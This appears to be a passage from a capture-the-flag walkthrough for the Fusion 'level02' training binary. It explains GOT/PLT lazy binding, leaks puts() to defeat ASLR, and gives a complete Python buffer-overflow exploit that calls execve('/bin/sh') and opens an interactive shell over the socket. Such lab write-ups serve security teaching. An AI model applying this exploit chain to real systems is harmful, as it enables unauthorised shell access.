We're at step 1 right now, so we need to choose the function whose address we are going to leak. Before we get to that, let's give a brief overview of how the program finds the addresses of libc functions. There is something called the Global Offset Table (GOT), which serves as a list of addresses. Each GOT entry is a fixed location where the address of a certain libc function will be stored at runtime. It's as if the GOT were telling us that the address of printf() will be stored at 0xc0debabe at runtime. So if we were to read what is stored at 0xc0debabe at runtime, we would find another address, say 0xaabbccdd, and that would be the address of printf(). We can use the objdump tool to view the GOT entry for a function:

fusion@fusion:~$ objdump -R /opt/fusion/bin/level02

/opt/fusion/bin/level02: file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
0804b368 R_386_GLOB_DAT    __gmon_start__
0804b420 R_386_COPY        __environ
0804b424 R_386_COPY        stderr
0804b428 R_386_COPY        stdin
0804b440 R_386_COPY        stdout
0804b378 R_386_JUMP_SLOT   setsockopt
0804b37c R_386_JUMP_SLOT   dup2
0804b380 R_386_JUMP_SLOT   setresuid
0804b384 R_386_JUMP_SLOT   read
0804b388 R_386_JUMP_SLOT   printf
[...] other entries follow
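If we don't want to read these addresses off by hand, a few lines of Python can pull them out of the objdump text. This is only a sketch: parse_relocations is a name made up for this example, it is written for Python 3, and it assumes the three-column layout shown above, keeping only the R_386_JUMP_SLOT rows.

```python
def parse_relocations(objdump_output):
    """Map function name -> GOT slot address from `objdump -R` text."""
    slots = {}
    for line in objdump_output.splitlines():
        fields = line.split()
        # A relocation row has exactly three columns: OFFSET TYPE VALUE
        if len(fields) == 3 and fields[1] == 'R_386_JUMP_SLOT':
            slots[fields[2]] = int(fields[0], 16)
    return slots

# A few rows copied from the listing above
sample = """\
0804b368 R_386_GLOB_DAT    __gmon_start__
0804b384 R_386_JUMP_SLOT   read
0804b388 R_386_JUMP_SLOT   printf
"""

got = parse_relocations(sample)
print(hex(got['printf']))  # 0x804b388
```

Only the jump slots are kept because those are the entries the PLT stubs jump through, which is what matters for the leak.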

So, at runtime, 0x804b388 will contain the address of printf(). But it doesn't end here. The entry will be populated with the correct printf() address only after printf() has been called for the first time. For that reason, we also have the PLT, the Procedure Linkage Table. The program works directly with the PLT. So if our program wants to call printf(), it will actually call a small stub called printf@plt(). If we try to disassemble the printf() function in gdb, we will end up disassembling this stub. Let's give it a try:

(gdb) disas printf
Dump of assembler code for function printf@plt:
0x08048870 <+0>: jmp *0x804b388
0x08048876 <+6>: push $0x20
0x0804887b <+11>: jmp 0x8048820
End of assembler dump.

It looks like the stub doesn't do much. The first line of the stub jumps to the address stored in 0x804b388. That looks like the GOT entry for printf(). Let's inspect that address with gdb:

(gdb) x *0x804b388
0x8048876 <printf@plt+6>: 0x00002068

So 0x804b388, which is the GOT entry for printf(), actually contains 0x8048876, which is the address of the second instruction in the printf@plt() stub. The other two instructions of the stub call the resolver, which finds the real address of printf() and writes it into the GOT entry, so that the next time the entry is used it holds the address of the printf() function itself.
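To make the mechanism concrete, here is a toy model of lazy binding in Python 3. Nothing here touches a real process: ToyProcess is made up for illustration, 0xaabbccdd is the same placeholder address used earlier, and the resolver is reduced to a single assignment.

```python
PRINTF_PLT = 0x08048870   # start of the printf@plt stub (from the gdb dump)
PRINTF_GOT = 0x0804b388   # GOT slot the stub jumps through

class ToyProcess:
    def __init__(self):
        # Before the first call, the slot points back into the stub (+6)
        self.got = {PRINTF_GOT: PRINTF_PLT + 6}
        self.real_printf = 0xaabbccdd   # placeholder, not a real address
        self.resolver_calls = 0

    def call_printf(self):
        """Return the address that execution ends up at."""
        target = self.got[PRINTF_GOT]          # jmp *0x804b388
        if target == PRINTF_PLT + 6:
            # push $0x20 ; jmp 0x8048820  -> the resolver runs once
            self.resolver_calls += 1
            self.got[PRINTF_GOT] = self.real_printf
            target = self.real_printf
        return target

p = ToyProcess()
print(hex(p.got[PRINTF_GOT]))   # 0x8048876: a leak now would be useless
p.call_printf()
print(hex(p.got[PRINTF_GOT]))   # 0xaabbccdd: a leak now gives the real address
```

The two prints show why the timing matters: reading the slot before the first call only yields an address inside the binary itself.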

This information was provided so that we know what to look for, and why. Specifically, we are looking for a function that we are 100% certain has been called at least once, so that the value we leak from its GOT entry is the real address of the function. For this reason, we will choose puts(). If you remember, we showed above that puts() is called instead of printf(), when we disassembled the first instructions of the encrypt_file() function. Now we need the GOT entry address for puts(). We can find it by using objdump:

fusion@fusion:~$ objdump -R /opt/fusion/bin/level02 | grep puts
0804b3b8 R_386_JUMP_SLOT puts

So, in order to leak the address of puts() at runtime, we need to read the value stored at 0x804b3b8.

Digging Our Way Towards the Shell

We theoretically solved the first step in our checklist (introduced in the section above), and we are now very close to getting to the shell. Let's first find out the addresses of execve() and "/bin/sh" relative to puts().

fusion@fusion:~$ ps -ef | grep level02
20002 1471 1 0 Aug15 ? 00:00:00 /opt/fusion/bin/level02
fusion 18773 2023 0 23:28 pts/1 00:00:00 grep --color=auto level02
fusion@fusion:~$ sudo gdb /opt/fusion/bin/level02 --pid=1471
[sudo] password for fusion:
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
[...]
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb7730424 in __kernel_vsyscall ()
(gdb) find &system, &system+100000000, "/bin/sh"
0xb76e08da
warning: Unable to access target memory at 0xb7722f62, halting search.
1 pattern found.
(gdb) find &system, &system+10000000, "/bin/sh"
0xb76e08da
warning: Unable to access target memory at 0xb7722f62, halting search.
1 pattern found.
(gdb) x &puts
0xb76083b0 <_IO_puts>: 0x8920ec83
(gdb) x &execve
0xb7643910 <__execve>: 0x8908ec83

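So we first found the pid for level02, attached gdb to the process, and looked up the addresses of "/bin/sh", puts() and execve(). The absolute addresses change when ASLR moves libc, but the distances between locations inside libc stay the same, so we will now use the addresses we found to compute the offsets of execve() and "/bin/sh" from puts().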

execve_offset = 0xb7643910 - 0xb76083b0

binsh_offset = 0xb76e08da - 0xb76083b0
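Let's work the arithmetic through once, as a small Python 3 sketch. The three *_SEEN constants are the addresses from the gdb session above; the function name rebase is made up for this example. It takes the 4 raw bytes that the leak returns and produces the two addresses we need.

```python
import struct

# Addresses observed in the gdb session above
PUTS_SEEN = 0xb76083b0
EXECVE_SEEN = 0xb7643910
BINSH_SEEN = 0xb76e08da

EXECVE_OFFSET = EXECVE_SEEN - PUTS_SEEN   # 0x3b560
BINSH_OFFSET = BINSH_SEEN - PUTS_SEEN     # 0xd852a

def rebase(leaked_bytes):
    """Turn the 4 leaked bytes of puts()'s GOT entry into
    (address of execve, address of "/bin/sh")."""
    (puts_address,) = struct.unpack('<I', leaked_bytes)
    return puts_address + EXECVE_OFFSET, puts_address + BINSH_OFFSET

# Sanity check: feeding back the puts() address we saw in gdb
# must reproduce the other two addresses from the same session.
execve_addr, binsh_addr = rebase(struct.pack('<I', PUTS_SEEN))
print(hex(execve_addr), hex(binsh_addr))  # 0xb7643910 0xb76e08da
```

These offsets only hold for this particular libc build; a different libc version would need its own measurements.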

We will use these offsets in our exploit payload. Now the plan is to first leak the address of puts(), then redirect execution from nwrite() to encrypt_file() again. We will overflow the buffer in encrypt_file() again, this time issuing a call to execve("/bin/sh", NULL, NULL) and thus launching the shell. Let's waste no time and write ourselves an exploit:


def exploit(fd, key):
    junk_len = 131072 + 16
    nwrite_address = 0x80495a0
    encrypt_file = 0x080497f7 # address of encrypt_file() we got from gdb
                              # in the arbitrary read primitive section
    puts_got_entry = 0x804b3b8 
    param_stdout = 1
    payload = junk_len * 'A'
    payload += pack('<I', nwrite_address)
    payload += pack('<I', encrypt_file)
    payload += pack('<I', param_stdout)
    payload += pack('<I', puts_got_entry)
    payload += pack('<I', 4) # 4 = size of address
    payload = xor(payload, key)
    encrypt_data(fd, payload)
    send_quit(fd) # trigger the exploit
    
    puts_address, = unpack('<I', fd.read(4))
    
    consume_welcome_message(fd) # welcome message is printed again
    
    execve_offset = 0xb7643910 - 0xb76083b0
    binsh_offset = 0xb76e08da - 0xb76083b0
    
    payload = junk_len * 'A'
    payload += pack('<I', execve_offset + puts_address)
    payload += pack('<I', 0xdeadbeef)
    payload += pack('<I', binsh_offset + puts_address)
    payload += pack('<I', 0) # two NULL
    payload += pack('<I', 0) # arguments
    payload = xor(payload, key)
    encrypt_data(fd, payload)
    send_quit(fd) # spawn the shell


# now changes to our main method
def main():
    sock = connect()
    sock_fd = sock.makefile('rw', bufsize=0) # file descriptor for socket
    
    consume_welcome_message(sock_fd)
    
    key = retrieve_key(sock_fd)
    
    # after this method call the shell will be listening for our commands
    exploit(sock_fd, key)
    
    # we use telnetlib to interact with the shell
    t = telnetlib.Telnet()
    t.sock = sock
    t.interact()

Our main method now calls the exploit method and then uses the interact() method of a Telnet object. Since the victim program's I/O is connected to the socket, and we expect execve("/bin/sh", NULL, NULL) to have run, the shell should be listening for our commands on the socket. The Telnet object, given the socket, hides the boring stuff and gives us a simple interface for issuing commands.
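A note for anyone porting the script to Python 3: telnetlib was deprecated in Python 3.11 and removed in 3.13. Here is a minimal sketch of a replacement that sends one command and collects the reply using only the socket module. The helper run_command is made up for this example, and the half-second timeout is an arbitrary assumption about how quickly the shell answers.

```python
import socket

def run_command(sock, command, timeout=0.5):
    """Send one shell command and return whatever arrives before the timeout."""
    sock.sendall(command.encode() + b'\n')
    sock.settimeout(timeout)
    chunks = []
    try:
        while True:
            data = sock.recv(4096)
            if not data:          # peer closed the connection
                break
            chunks.append(data)
    except socket.timeout:        # nothing more arrived in time
        pass
    return b''.join(chunks).decode(errors='replace')
```

With the socket from main(), print(run_command(sock, 'id')) would take the place of the interactive session for a single command. It is not a full terminal, so anything that needs a tty will still misbehave.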

If everything went well, executing that script should give us a shell prompt:

fusion@fusion:~$ ./exploit.py
id

uid=20002 gid=20002 groups=20002

As we can see, after running the script, it doesn't exit. Instead, it is waiting for us to input a command. We give the command id, and we get the uid, gid and groups with a value of 20002, meaning we have successfully exploited level02 and gained shell access. Congratulations!

You can also find the exploit on GitHub. There are minor changes compared to the code in here, but the basics remain the same.

I'd love to hear your thoughts on this.